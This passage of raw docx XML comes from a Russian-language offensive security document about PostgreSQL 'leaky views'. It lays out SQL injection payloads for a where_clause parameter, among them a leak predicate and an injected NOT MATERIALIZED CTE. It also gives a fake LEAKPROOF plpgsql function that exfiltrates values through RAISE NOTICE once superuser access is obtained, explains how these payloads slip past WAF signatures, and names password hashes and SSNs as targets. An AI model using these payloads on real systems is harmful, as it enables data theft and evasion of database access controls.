    <w:p w14:paraId="381996A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Разработчик ожидает, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH safe AS (SELECT * FROM orders_visible)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> материализуется (потому что в PG ≤ 11 это было так), и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>leak()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполнится </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>после</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> view-фильтра. На PG 12+ CTE inlined — защита не работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B476E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующий явно блокирует возможный future-fix через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:t>-keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4262A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>where_clause</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CF2EE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true AND leak(internal_notes, 'secret_pre') -- (плюс затирание оставшегося SQL через --)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E474164" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Здесь CTE-обёртка уже в коде; атакующий просто добавляет leaky-предикат во внешний WHERE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA45B44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если разработчик потом «починит» через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH safe AS MATERIALIZED (...)</w:t>
      </w:r>
      <w:r>
        <w:t>, атакующий контр-атакует другим payload — внедряя свой CTE-блок:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724E138C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true AND id IN (WITH attacker AS NOT MATERIALIZED (SELECT id FROM orders_visible WHERE leak(internal_notes, 'secret_pre')) SELECT id FROM attacker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3850C584" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB622E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH safe AS MATERIALIZED (SELECT * FROM orders_visible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6602D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, customer_name, total FROM safe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27879C71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE true AND id IN (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18896695" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  WITH attacker AS NOT MATERIALIZED (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A311933" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT id FROM orders_visible WHERE leak(internal_notes, 'secret_pre')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A0A6C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462ACD53" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  SELECT id FROM attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7313C96F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592390D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Внутренний </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH attacker AS NOT MATERIALIZED (...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> форсирует inline (даже на PG 12+ это explicit), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>leak()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> снова пушится через view → leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4477BEE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — обход security_barrier через `LEAKPROOF`-функцию атакующего</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E36C00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если view создана с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (защита включена), planner блокирует push-down любой функции, не помеченной как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LEAKPROOF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Атакующий может создать функцию с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LEAKPROOF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-флагом — но это требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (документировано в PG 9.2+: только superuser может создать LEAKPROOF-функцию, чтобы избежать тривиального обхода).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB30BCC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Если у атакующего есть SUPERUSER (через 3.13):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D87C1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION fake_leakproof(t text, guess text) RETURNS boolean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061E0056" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LANGUAGE plpgsql LEAKPROOF COST 0.0001 AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FFA5A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3581E8C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  IF t LIKE guess || '%' THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CC0B95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RAISE NOTICE 'leak: %', t;  -- через NOTICE-канал, без exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E5458B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A9CD58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RETURN false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28379FBB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F79EF3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E99BE32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LEAKPROOF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> декларирует «функция не leak-ит», что планировщик принимает на веру. С этим флагом push-down разрешён даже через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Внутри функция всё равно leak-ит — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RAISE NOTICE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (notice идёт клиенту через async-канал, виден приложением).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B226FFC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это критическая комбинация: SUPERUSER + 3.10.3 → обход даже корректно настроенного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=on</w:t>
      </w:r>
      <w:r>
        <w:t>. Поэтому 3.13 (privilege escalation) — пререквизит для этого payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732EFEFE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что произойдёт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF95E91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующий получает прямой доступ к строкам, которые view скрывает через WHERE-фильтр. Бинарный/итеративный поиск по leaky-функции восстанавливает значения сoлумни-за-колумной из чужих rows. Если view скрывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ssn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>internal_notes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — все эти данные leak-аются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ADCA1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">С </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Payload C) — то же, но требует SUPERUSER для создания LEAKPROOF-функции, что нивелирует ACL-view как защитный механизм против atomic-уровня compromised user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672F10CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A45BA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=off</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>дефолт</w:t>
      </w:r>
      <w:r>
        <w:t>. Большинство DBA не знают про этот флаг или не включают (он замедляет планировщик); leaky-views — open default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235C943F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   WAF не блокирует CREATE FUNCTION — это не строка в blacklist (DDL обычно в payload не появляется на read-path; атакующий создаёт функцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>один раз</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через отдельный inject в admin-эндпоинт или через 3.13 → 3.7).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AFFD6B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH ... AS NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стандартный SQL keyword (PG 12+). WAF-сигнатура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bWITH\b.*\bNOT\s+MATERIALIZED\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> редко в правилах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4799C51E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Inline CTE — дефолт PG 12+; в большинстве кодовых баз CTE-обёртки писались без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (потому что в PG ≤ 11 это было лишнее) → массово unsafe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712BE22B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B907665" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`security_barrier`</w:t>
      </w:r>
      <w:r>
        <w:t>: VIEW-опция, документация https://www.postgresql.org/docs/current/rules-privileges.html#RULES-PRIVILEGES. С PG 9.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301AD463" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pushdown rules</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: PG-планировщик пушит quals (predicates) через view-границы, если функция не помечена </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LEAKPROOF=false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> явно (либо view не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=on</w:t>
      </w:r>
      <w:r>
        <w:t>). Это поведение задокументировано как «leaky views problem».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1052AFB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`LEAKPROOF`-flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: documentation — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
